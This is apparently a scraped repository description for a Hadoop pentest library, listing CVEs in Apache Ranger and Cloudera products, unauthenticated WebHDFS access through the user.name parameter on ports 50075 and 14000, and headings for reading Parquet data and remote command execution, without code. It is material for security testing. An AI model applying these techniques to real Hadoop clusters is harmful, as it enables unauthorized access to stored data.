hadoop attack library is a collection of pentest tools and resources targeting Hadoop environments.

hadoop attack library is a collection of pentest tools and resources targeting Hadoop environments.

hadoop attack library is A collection of pentest tools and resources targeting Hadoop environments.
This repository is composed of two kind of information and organised accordingly:
+ Tools, Techniques and Procedures to attack an Hadoop environments, in the Tools Techniques and Procedures folder
+ Key vulnerabilities in third-party components often used Hadoop environments, in the Third-party modules vulnerabilities folder

* Third-party modules vulnerabilities:
++ Apache Ranger
** CVE-2016-2174 – Authenticated SQL injection
** Unauthenticated policy download Apache Ranger =< 0.5.2 allows to download policy definitions without authentication through the following GET request.
++ Cloudera HUE
** CVE-2016-4947 – Enumerating users with an unprivileged account
** Cloudera HUE =< 3.9.0 is vulnerable to an open redirection in the hidden next parameter of the login form.
++ Cloudera Manager
** CVE-2016-4948 – Stored and reflected XSS
** CVE-2016-4950 – Process logs access; Cloudera Manager =< 5.5 is vulnerable to an access control issue allowing any user to access any process logs, on standard output and error descriptors
** CVE-2016-4950 – Enumerating user sessions with an unprivileged account.

* Tools Techniques and Procedures:
++ Browsing the HDFS datalake
WebHDFS offers REST API for users to access data on the HDFS filesystem using the HTTP protocol.
The API allows to perform all possible actions on the HDFS filesystem (view, create, modify, etc.).
By default, if Kerberos authentication is not enabled, no credential is needed to request these services: only identification is needed using the user.name parameter.
WebHDFS API are exposed on the following services:
+ HDFS DataNode WebUI on port 50075
+ HttpFS module on port 14000

HDFSBrowser

HDFSBrowser

++ Getting the environment configuration
++ Reading Apache Parquet files
Apache Parquet is a storage format widely used in Big Data environments.
As an attacker, you might be facing this format after getting access to the datalake.
Two options to be able to read this format:
1. Compile the parquet-tools utility to be used in the hadoop mode: a working Hadoop environment is needed to run the utility as all Hadoop jars are required in the classpath
2. Compile the parquet-tools utility to in the local standalone mode: no external Hadoop jar will be required as they are packaged into the build
For each of these options, guidelines are provided in the project

Parquet Tools

Parquet Tools

++ Remote executing commands

Dependencies:
– Python 2.7.x
– Java JDK 7-8

Usage and Download:

Source: https://github.com/CERT-W